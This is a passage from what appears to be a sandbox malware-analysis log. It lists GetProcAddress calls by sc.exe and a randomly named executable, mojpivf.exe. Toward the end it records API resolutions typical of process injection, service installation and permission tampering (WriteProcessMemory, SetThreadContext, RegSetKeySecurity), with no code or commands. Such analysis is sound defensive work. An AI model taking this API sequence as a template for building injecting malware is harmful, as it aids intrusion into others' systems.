CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004364)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004364)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00002772)\n 